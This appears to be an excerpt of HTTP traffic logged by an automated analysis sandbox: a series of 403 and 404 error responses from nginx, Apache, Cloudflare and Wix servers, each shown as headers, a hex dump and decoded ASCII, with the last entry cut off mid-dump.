                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd3kzTVEeNf/iB9j3c1cpqs,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1678431380.94282936722515945X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=89sNibQeiybxZxaI0gqWEcxAlfywgSvX1rIV%2FTI3TuV6RQan%2BGGnAOJW3nxb6%2BJnTSBJXQNZdi0uUyUKN%2B%2BARBQj2XA10xkpM%2BYnw8mjfY7yVnIrVIN5q%2B%2BdzYuOV7pw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8432e729164-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:21 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cF8yXS5WmcfPmSx%2BeLwFqxwHFrv5Zoxm2nqA6OmolTF%2BesIGcawdQLJzP4rmRLRNWNmxefni576U%2FuSLChyMG5EpbaHCe0%2FpZddhF9KHRJkm%2BqPsXV5znCqllV2OOmYn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8442fcd9164-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h8NnwUTZx0APx5TcKXHo6Wthe9sjxaJZ3qUyoIP5M1TFT2Hz79g3lSWmMMDrrkWUpOxnIE1CwJdDR7vZCAOnLq72f%2FtAeJZppOre%2Bf3KsIuan%2FC2i7yp4DsygHqIBQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a846985e3641-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 Data Ascii: 1c33<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta na
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:21 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:21 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdEnlsNgfYIuRtjiBo/Dnb1,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1678431381.749338890802616770X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:21 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:22 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:22 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:22 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FjCF8S%2B5TwFZX3aSX5uqbzh007hEkXbLA%2BCJnj4Y5i1AGU9iRWCAEkiae2RQ%2BVuBwwvHzzOxHMwIopHCrIgyPsh5AUSMWrKfTQMAXJ65XpzrdJ9LPQTirqbRg9esSy8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a84e789830f6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:23 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 